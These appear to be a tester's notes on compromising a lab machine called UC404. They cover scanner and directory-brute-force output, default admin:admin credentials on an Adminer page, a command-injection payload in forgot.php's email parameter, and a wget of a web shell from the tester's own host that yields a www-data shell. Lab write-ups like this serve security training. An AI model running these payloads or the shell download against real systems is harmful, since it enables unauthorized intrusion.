2 :80 adminlte
http://192.168.136.109/
AdminLTE 3 Landing Page
| (bottom-of-page) AdminLTE.io Version 3.1.0-pre
| its a visual template
# from nmapAutomator
| http-enum:
| /.gitignore: Revision control ignore file
| /.git/HEAD: Git folder
| http-git:
| 192.168.136.109:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
| https://github.com/ColorlibHQ/AdminLTE.git
|_ Project type: Ruby on Rails web application (guessed from .gitignore)
# nikto
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /package.json: Node.js package file found. It may contain sensitive information.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
$ gobuster dir -u http://192.168.136.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,html,txt -t 90
===============================================================
/pages (Status: 301) [Size: 318] [--> http://192.168.136.109/pages/]
/index2.html (Status: 200) [Size: 71875]
/demo (Status: 301) [Size: 317] [--> http://192.168.136.109/demo/]
/index.html (Status: 200) [Size: 60628]
/plugins (Status: 301) [Size: 320] [--> http://192.168.136.109/plugins/]
/db (Status: 301) [Size: 315] [--> http://192.168.136.109/db/]
/index3.html (Status: 200) [Size: 42799]
/dist (Status: 301) [Size: 317] [--> http://192.168.136.109/dist/]
/build (Status: 301) [Size: 318] [--> http://192.168.136.109/build/]
/LICENSE (Status: 200) [Size: 1082]
/starter.html (Status: 200) [Size: 12884]
/under_construction (Status: 301) [Size: 331] [--> http://192.168.136.109/under_construction/]
# ffuf
docs [Status: 301, Size: 317, Words: 20, Lines: 10]
http://192.168.136.109/db/
Adminer 4.7.7
# from git-repo page
https://github.com/ColorlibHQ/AdminLTE.git
http://192.168.136.109/package.json
"name": "admin-lte",
"version": "3.1.0-pre",
# exploring 192.168.136.109/db
# brute-forcing admin:admin for the different db-types
# worked
System: ClickHouse (alpha)
Server: localhost
Username: admin
Password: admin
http://192.168.136.109/db/?clickhouse=localhost&username=admin
ClickHouse (alpha) version: through PHP extension JSON
Logged as: admin
# definitely a rabbit hole; can't get anything out of it
http://192.168.136.109/under_construction/
Login Page | UC404
# needs email; don't know it
http://192.168.136.109/under_construction/register.html
has nothing
http://192.168.136.109/under_construction/forgot.php
# view source shows
<!--
______ __ __ _____ _ _______ _______ _______ ______ __ __
| ____| \/ | /\ |_ _| | / ____\ \ / / ____|__ __| ____| \/ |
| |__ | \ / | / \ | | | | | (___ \ \_/ / (___ | | | |__ | \ / |
| __| | |\/| | / /\ \ | | | | \___ \ \ / \___ \ | | | __| | |\/| |
| |____| | | |/ ____ \ _| |_| |____ ____) | | | ____) | | | | |____| | | |
|______|_| |_/_/ \_\_____|______| |_____/ |_| |_____/ |_| |______|_| |_|
---- Under Construction ----
sendmail.php must receive the variable from the html form and send the message.
|| For security reasons we are working to blacklist some characters ||
//-->
Could not open input file: sendmail.php
1
# trying admin@uc404.com
nothing
# file sendmail.php maybe is not there?
# trying code injection via Burp on GET, as page had
# `Could not open input file: sendmail.php` on GET request
# trying stack query first
GET /under_construction/forgot.php?email=;id HTTP/1.1
Host: 192.168.136.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Upgrade-Insecure-Requests: 1
# response
Could not open input file: sendmail.php
1
Using https://book.hacktricks.xyz/pentesting-web/command-injection
email=||+id
Could not open input file: sendmail.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# we have code execution
email=||wget+192.168.49.136/web.php
http://192.168.136.109/under_construction/web.php
# we have shell
CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
UC404
Linux UC404 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
Last updated